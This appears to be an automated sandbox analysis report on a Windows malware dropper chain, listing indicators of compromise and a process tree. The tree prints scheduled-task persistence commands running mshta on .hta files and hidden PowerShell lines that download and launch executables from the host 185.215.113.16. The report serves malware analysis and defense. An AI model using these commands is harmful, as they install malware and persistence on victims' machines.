description pid Process procid_target PID 3952 set thread context of 2512 3952 f3Ypd8O.exe 139 PID 1948 set thread context of 4532 1948 7aencsM.exe 143 PID 5604 set thread context of 5692 5604 9aiiMOQ.exe 170 PID 3380 set thread context of 5380 3380 con12312211221.exe 248 PID 6740 set thread context of 6756 6740 monthdragon.exe 254 PID 7104 set thread context of 6868 7104 0519cf3c64.exe 260 PID 1880 set thread context of 6420 1880 alex12112.exe 262 PID 5160 set thread context of 1372 5160 fher.exe 267 PID 6828 set thread context of 5148 6828 f613a12ef8.exe 271 -
Drops file in Windows directory 6 IoCs
description ioc Process File opened for modification C:\Windows\Tasks\okhxpkh.job kdMujZh.exe File created C:\Windows\Tasks\lpsbw.job kdMujZh.exe File opened for modification C:\Windows\Tasks\lpsbw.job kdMujZh.exe File created C:\Windows\Tasks\futors.job amnew.exe File created C:\Windows\Tasks\skotes.job TempPWOPLEBXNAP7WZSLLCZKU8XKUNEIJTQ6.EXE File created C:\Windows\Tasks\okhxpkh.job kdMujZh.exe -
Detects Pyinstaller 1 IoCs
resource yara_rule behavioral2/files/0x0004000000022eac-1800.dat pyinstaller -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 8 IoCs
pid pid_target Process procid_target 1680 3360 WerFault.exe 130 3104 3952 WerFault.exe 137 4200 1948 WerFault.exe 142 5752 5604 WerFault.exe 165 5680 3380 WerFault.exe 247 6776 6740 WerFault.exe 252 6508 1880 WerFault.exe 261 6816 5160 WerFault.exe 265 -
System Location Discovery: System Language Discovery 1 TTPs 64 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language d2YQIJa.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language f613a12ef8.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ee1401f004.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language skotes.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language e4c9d2bfff.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language timeout.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 0f8ce684d7.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language alex12112.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language TempCVUKSYKBKZBYUQECJTUKHNINUFUBOHIJ.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language kdMujZh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 6ccbdd7074.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language dd8dbe5ac0.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language\InstallLanguage dd8dbe5ac0.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language amnew.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language TempPWOPLEBXNAP7WZSLLCZKU8XKUNEIJTQ6.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 7aencsM.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language monthdragon.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language fher.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 95c0f4af36.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 4c708b9de9.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language f3Ypd8O.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 9aiiMOQ.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language okhxpkh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language monthdragon.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language alex12112.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 40e0b6ad21.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language lpsbw.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language con12312211221.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language BitLockerToGo.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 8827e2f2e3.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 483d2fa8a0d53818306efeb32d3.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language f3Ypd8O.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 7aencsM.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 0519cf3c64.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 0f807048bd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 198cfc7201.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language TempVTMZEVGJD6GVC5WRW71CZPT2AU5O57WY.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 18b64e1917.exe -
Checks processor information in registry 2 TTPs 19 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString 90ced29b15.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString 7aencsM.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 ee1401f004.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString 18b64e1917.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 7aencsM.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 90ced29b15.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 msedge.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 18b64e1917.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString ee1401f004.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier firefox.exe -
Delays execution with timeout.exe 1 IoCs
pid Process 1948 timeout.exe -
Enumerates system info in registry 2 TTPs 11 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName chrome.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU msedge.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe -
Kills process with taskkill 5 IoCs
pid Process 528 taskkill.exe 5212 taskkill.exe 2140 taskkill.exe 1432 taskkill.exe 5940 taskkill.exe -
Modifies data under HKEY_USERS 2 IoCs
description ioc Process Set value (int) \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133844852278210476" chrome.exe Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry chrome.exe -
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000_Classes\Local Settings firefox.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 4 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2392 schtasks.exe 400 schtasks.exe 2176 schtasks.exe 5084 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 1680 powershell.exe 1680 powershell.exe 4120 TempPWOPLEBXNAP7WZSLLCZKU8XKUNEIJTQ6.EXE 4120 TempPWOPLEBXNAP7WZSLLCZKU8XKUNEIJTQ6.EXE 404 skotes.exe 404 skotes.exe 3364 kdMujZh.exe 3364 kdMujZh.exe 2276 skotes.exe 2276 skotes.exe 4600 8827e2f2e3.exe 4600 8827e2f2e3.exe 4600 8827e2f2e3.exe 4600 8827e2f2e3.exe 4600 8827e2f2e3.exe 4600 8827e2f2e3.exe 3352 powershell.exe 3352 powershell.exe 3364 kdMujZh.exe 3364 kdMujZh.exe 2432 okhxpkh.exe 2432 okhxpkh.exe 2396 TempCVUKSYKBKZBYUQECJTUKHNINUFUBOHIJ.EXE 2396 TempCVUKSYKBKZBYUQECJTUKHNINUFUBOHIJ.EXE 1336 powershell.exe 1336 powershell.exe 4620 powershell.exe 4620 powershell.exe 2396 TempCVUKSYKBKZBYUQECJTUKHNINUFUBOHIJ.EXE 2396 TempCVUKSYKBKZBYUQECJTUKHNINUFUBOHIJ.EXE 2868 powershell.exe 2868 powershell.exe 3648 0f807048bd.exe 3648 0f807048bd.exe 1132 powershell.exe 1132 powershell.exe 1132 powershell.exe 4604 483d2fa8a0d53818306efeb32d3.exe 4604 483d2fa8a0d53818306efeb32d3.exe 3360 18b64e1917.exe 3360 18b64e1917.exe 3360 18b64e1917.exe 3360 18b64e1917.exe 3648 0f807048bd.exe 3648 0f807048bd.exe 3648 0f807048bd.exe 4104 90ced29b15.exe 4104 90ced29b15.exe 4104 90ced29b15.exe 4104 90ced29b15.exe 4104 90ced29b15.exe 4104 90ced29b15.exe 4104 90ced29b15.exe 4104 90ced29b15.exe 4104 90ced29b15.exe 4104 90ced29b15.exe 880 40e0b6ad21.exe 880 40e0b6ad21.exe 880 40e0b6ad21.exe 880 40e0b6ad21.exe 880 40e0b6ad21.exe 880 40e0b6ad21.exe 4544 d2YQIJa.exe 4544 d2YQIJa.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 10 IoCs
pid Process 400 chrome.exe 400 chrome.exe 400 chrome.exe 4224 chrome.exe 4224 chrome.exe 4224 chrome.exe 1432 msedge.exe 1432 msedge.exe 1432 msedge.exe 1432 msedge.exe -
Suspicious use of AdjustPrivilegeToken 39 IoCs
description pid Process Token: SeDebugPrivilege 1680 powershell.exe Token: SeDebugPrivilege 3352 powershell.exe Token: SeDebugPrivilege 1336 powershell.exe Token: SeDebugPrivilege 4620 powershell.exe Token: SeDebugPrivilege 2396 TempCVUKSYKBKZBYUQECJTUKHNINUFUBOHIJ.EXE Token: SeDebugPrivilege 2868 powershell.exe Token: SeDebugPrivilege 1132 powershell.exe Token: SeDebugPrivilege 3648 0f807048bd.exe Token: SeDebugPrivilege 1956 powershell.exe Token: SeDebugPrivilege 2812 powershell.exe Token: SeShutdownPrivilege 400 chrome.exe Token: SeCreatePagefilePrivilege 400 chrome.exe Token: SeShutdownPrivilege 400 chrome.exe Token: SeCreatePagefilePrivilege 400 chrome.exe Token: SeShutdownPrivilege 400 chrome.exe Token: SeCreatePagefilePrivilege 400 chrome.exe Token: SeDebugPrivilege 5784 powershell.exe Token: SeShutdownPrivilege 400 chrome.exe Token: SeCreatePagefilePrivilege 400 chrome.exe Token: SeShutdownPrivilege 400 chrome.exe Token: SeCreatePagefilePrivilege 400 chrome.exe Token: SeShutdownPrivilege 400 chrome.exe Token: SeCreatePagefilePrivilege 400 chrome.exe Token: SeShutdownPrivilege 400 chrome.exe Token: SeCreatePagefilePrivilege 400 chrome.exe Token: SeShutdownPrivilege 4224 chrome.exe Token: SeCreatePagefilePrivilege 4224 chrome.exe Token: SeDebugPrivilege 5212 taskkill.exe Token: SeShutdownPrivilege 4224 chrome.exe Token: SeCreatePagefilePrivilege 4224 chrome.exe Token: SeShutdownPrivilege 4224 chrome.exe Token: SeCreatePagefilePrivilege 4224 chrome.exe Token: SeDebugPrivilege 2140 taskkill.exe Token: SeDebugPrivilege 1432 taskkill.exe Token: SeDebugPrivilege 4288 powershell.exe Token: SeDebugPrivilege 5940 taskkill.exe Token: SeDebugPrivilege 528 taskkill.exe Token: SeDebugPrivilege 6076 firefox.exe Token: SeDebugPrivilege 6076 firefox.exe -
Suspicious use of FindShellTrayWindow 64 IoCs
pid Process 3384 5f21f5677d9cdc6313895450c2c169f170db029f491311203b22281a715f1201.exe 3384 5f21f5677d9cdc6313895450c2c169f170db029f491311203b22281a715f1201.exe 3384 5f21f5677d9cdc6313895450c2c169f170db029f491311203b22281a715f1201.exe 4120 TempPWOPLEBXNAP7WZSLLCZKU8XKUNEIJTQ6.EXE 2224 e4c9d2bfff.exe 2224 e4c9d2bfff.exe 2224 e4c9d2bfff.exe 400 chrome.exe 400 chrome.exe 400 chrome.exe 400 chrome.exe 400 chrome.exe 400 chrome.exe 400 chrome.exe 400 chrome.exe 400 chrome.exe 400 chrome.exe 400 chrome.exe 400 chrome.exe 400 chrome.exe 400 chrome.exe 400 chrome.exe 400 chrome.exe 400 chrome.exe 400 chrome.exe 400 chrome.exe 400 chrome.exe 400 chrome.exe 400 chrome.exe 400 chrome.exe 400 chrome.exe 400 chrome.exe 400 chrome.exe 4224 chrome.exe 4224 chrome.exe 4224 chrome.exe 4224 chrome.exe 4224 chrome.exe 4224 chrome.exe 4224 chrome.exe 4224 chrome.exe 4224 chrome.exe 4224 chrome.exe 4224 chrome.exe 4224 chrome.exe 4224 chrome.exe 4224 chrome.exe 4224 chrome.exe 4224 chrome.exe 4224 chrome.exe 4224 chrome.exe 4224 chrome.exe 4224 chrome.exe 4224 chrome.exe 4224 chrome.exe 4224 chrome.exe 4224 chrome.exe 4224 chrome.exe 4224 chrome.exe 1072 dd8dbe5ac0.exe 1072 dd8dbe5ac0.exe 1072 dd8dbe5ac0.exe 1072 dd8dbe5ac0.exe 1072 dd8dbe5ac0.exe -
Suspicious use of SendNotifyMessage 41 IoCs
pid Process 3384 5f21f5677d9cdc6313895450c2c169f170db029f491311203b22281a715f1201.exe 3384 5f21f5677d9cdc6313895450c2c169f170db029f491311203b22281a715f1201.exe 3384 5f21f5677d9cdc6313895450c2c169f170db029f491311203b22281a715f1201.exe 2224 e4c9d2bfff.exe 2224 e4c9d2bfff.exe 2224 e4c9d2bfff.exe 1072 dd8dbe5ac0.exe 1072 dd8dbe5ac0.exe 1072 dd8dbe5ac0.exe 1072 dd8dbe5ac0.exe 1072 dd8dbe5ac0.exe 4588 0f8ce684d7.exe 4588 0f8ce684d7.exe 4588 0f8ce684d7.exe 1072 dd8dbe5ac0.exe 1072 dd8dbe5ac0.exe 6076 firefox.exe 6076 firefox.exe 6076 firefox.exe 6076 firefox.exe 1072 dd8dbe5ac0.exe 6076 firefox.exe 6076 firefox.exe 6076 firefox.exe 6076 firefox.exe 6076 firefox.exe 6076 firefox.exe 6076 firefox.exe 6076 firefox.exe 6076 firefox.exe 6076 firefox.exe 6076 firefox.exe 6076 firefox.exe 6076 firefox.exe 6076 firefox.exe 6076 firefox.exe 6076 firefox.exe 1072 dd8dbe5ac0.exe 1072 dd8dbe5ac0.exe 1072 dd8dbe5ac0.exe 1072 dd8dbe5ac0.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 6076 firefox.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 3384 wrote to memory of 884 3384 5f21f5677d9cdc6313895450c2c169f170db029f491311203b22281a715f1201.exe 85 PID 3384 wrote to memory of 884 3384 5f21f5677d9cdc6313895450c2c169f170db029f491311203b22281a715f1201.exe 85 PID 3384 wrote to memory of 884 3384 5f21f5677d9cdc6313895450c2c169f170db029f491311203b22281a715f1201.exe 85 PID 3384 wrote to memory of 3344 3384 5f21f5677d9cdc6313895450c2c169f170db029f491311203b22281a715f1201.exe 86 PID 3384 wrote to memory of 3344 3384 5f21f5677d9cdc6313895450c2c169f170db029f491311203b22281a715f1201.exe 86 PID 3384 wrote to memory of 3344 3384 5f21f5677d9cdc6313895450c2c169f170db029f491311203b22281a715f1201.exe 86 PID 884 wrote to memory of 2392 884 cmd.exe 88 PID 884 wrote to memory of 2392 884 cmd.exe 88 PID 884 wrote to memory of 2392 884 cmd.exe 88 PID 3344 wrote to memory of 1680 3344 mshta.exe 91 PID 3344 wrote to memory of 1680 3344 mshta.exe 91 PID 3344 wrote to memory of 1680 3344 mshta.exe 91 PID 1680 wrote to memory of 4120 1680 powershell.exe 95 PID 1680 wrote to memory of 4120 1680 powershell.exe 95 PID 1680 wrote to memory of 4120 1680 powershell.exe 95 PID 4120 wrote to memory of 404 4120 TempPWOPLEBXNAP7WZSLLCZKU8XKUNEIJTQ6.EXE 96 PID 4120 wrote to memory of 404 4120 TempPWOPLEBXNAP7WZSLLCZKU8XKUNEIJTQ6.EXE 96 PID 4120 wrote to memory of 404 4120 TempPWOPLEBXNAP7WZSLLCZKU8XKUNEIJTQ6.EXE 96 PID 404 wrote to memory of 3364 404 skotes.exe 97 PID 404 wrote to memory of 3364 404 skotes.exe 97 PID 404 wrote to memory of 3364 404 skotes.exe 97 PID 404 wrote to memory of 4600 404 skotes.exe 101 PID 404 wrote to memory of 4600 404 skotes.exe 101 PID 404 wrote to memory of 4600 404 skotes.exe 101 PID 404 wrote to memory of 2224 404 skotes.exe 102 PID 404 wrote to memory of 2224 404 skotes.exe 102 PID 404 wrote to memory of 2224 404 skotes.exe 102 PID 2224 wrote to memory of 3648 2224 e4c9d2bfff.exe 103 PID 2224 wrote to memory of 3648 2224 e4c9d2bfff.exe 103 PID 2224 wrote to memory of 3648 2224 e4c9d2bfff.exe 103 PID 2224 wrote to memory of 4360 2224 e4c9d2bfff.exe 104 PID 2224 wrote to memory of 4360 2224 e4c9d2bfff.exe 104 PID 2224 wrote to memory of 4360 2224 e4c9d2bfff.exe 104 PID 3648 wrote to memory of 400 3648 cmd.exe 106 PID 3648 wrote to memory of 400 3648 cmd.exe 106 PID 3648 wrote to memory of 400 3648 cmd.exe 106 PID 4360 wrote to memory of 3352 4360 mshta.exe 107 PID 4360 wrote to memory of 3352 4360 mshta.exe 107 PID 4360 wrote to memory of 3352 4360 mshta.exe 107 PID 404 wrote to memory of 4580 404 skotes.exe 109 PID 404 wrote to memory of 4580 404 skotes.exe 109 PID 404 wrote to memory of 4580 404 skotes.exe 109 PID 4580 wrote to memory of 2536 4580 cmd.exe 111 PID 4580 wrote to memory of 2536 4580 cmd.exe 111 PID 4580 wrote to memory of 2536 4580 cmd.exe 111 PID 2536 wrote to memory of 1948 2536 cmd.exe 113 PID 2536 wrote to memory of 1948 2536 cmd.exe 113 PID 2536 wrote to memory of 1948 2536 cmd.exe 113 PID 3352 wrote to memory of 2396 3352 powershell.exe 114 PID 3352 wrote to memory of 2396 3352 powershell.exe 114 PID 3352 wrote to memory of 2396 3352 powershell.exe 114 PID 2536 wrote to memory of 4544 2536 cmd.exe 116 PID 2536 wrote to memory of 4544 2536 cmd.exe 116 PID 2536 wrote to memory of 4544 2536 cmd.exe 116 PID 4544 wrote to memory of 1336 4544 cmd.exe 117 PID 4544 wrote to memory of 1336 4544 cmd.exe 117 PID 4544 wrote to memory of 1336 4544 cmd.exe 117 PID 2536 wrote to memory of 1976 2536 cmd.exe 118 PID 2536 wrote to memory of 1976 2536 cmd.exe 118 PID 2536 wrote to memory of 1976 2536 cmd.exe 118 PID 1976 wrote to memory of 4620 1976 cmd.exe 119 PID 1976 wrote to memory of 4620 1976 cmd.exe 119 PID 1976 wrote to memory of 4620 1976 cmd.exe 119 PID 2536 wrote to memory of 3344 2536 cmd.exe 120 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\5f21f5677d9cdc6313895450c2c169f170db029f491311203b22281a715f1201.exe"C:\Users\Admin\AppData\Local\Temp\5f21f5677d9cdc6313895450c2c169f170db029f491311203b22281a715f1201.exe"1⤵
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:3384 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c schtasks /create /tn No8Yrmaizfu /tr "mshta C:\Users\Admin\AppData\Local\Temp\5ohpgXHlP.hta" /sc minute /mo 25 /ru "Admin" /f2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:884 -
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn No8Yrmaizfu /tr "mshta C:\Users\Admin\AppData\Local\Temp\5ohpgXHlP.hta" /sc minute /mo 25 /ru "Admin" /f3⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:2392
-
-
-
C:\Windows\SysWOW64\mshta.exemshta C:\Users\Admin\AppData\Local\Temp\5ohpgXHlP.hta2⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3344 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'PWOPLEBXNAP7WZSLLCZKU8XKUNEIJTQ6.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Downloads MZ/PE file
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1680 -
C:\Users\Admin\AppData\Local\TempPWOPLEBXNAP7WZSLLCZKU8XKUNEIJTQ6.EXE"C:\Users\Admin\AppData\Local\TempPWOPLEBXNAP7WZSLLCZKU8XKUNEIJTQ6.EXE"4⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:4120 -
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"5⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Downloads MZ/PE file
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Identifies Wine through registry keys
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:404 -
C:\Users\Admin\AppData\Local\Temp\1088207001\kdMujZh.exe"C:\Users\Admin\AppData\Local\Temp\1088207001\kdMujZh.exe"6⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
PID:3364
-
-
C:\Users\Admin\AppData\Local\Temp\1088414001\8827e2f2e3.exe"C:\Users\Admin\AppData\Local\Temp\1088414001\8827e2f2e3.exe"6⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:4600
-
-
C:\Users\Admin\AppData\Local\Temp\1088415101\e4c9d2bfff.exe"C:\Users\Admin\AppData\Local\Temp\1088415101\e4c9d2bfff.exe"6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:2224 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c schtasks /create /tn mMcYJmaQuvZ /tr "mshta C:\Users\Admin\AppData\Local\Temp\4etjqgqsj.hta" /sc minute /mo 25 /ru "Admin" /f7⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3648 -
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn mMcYJmaQuvZ /tr "mshta C:\Users\Admin\AppData\Local\Temp\4etjqgqsj.hta" /sc minute /mo 25 /ru "Admin" /f8⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:400
-
-
-
C:\Windows\SysWOW64\mshta.exemshta C:\Users\Admin\AppData\Local\Temp\4etjqgqsj.hta7⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4360 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'CVUKSYKBKZBYUQECJTUKHNINUFUBOHIJ.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/defend/random.exe',$d);Start-Process $d;8⤵
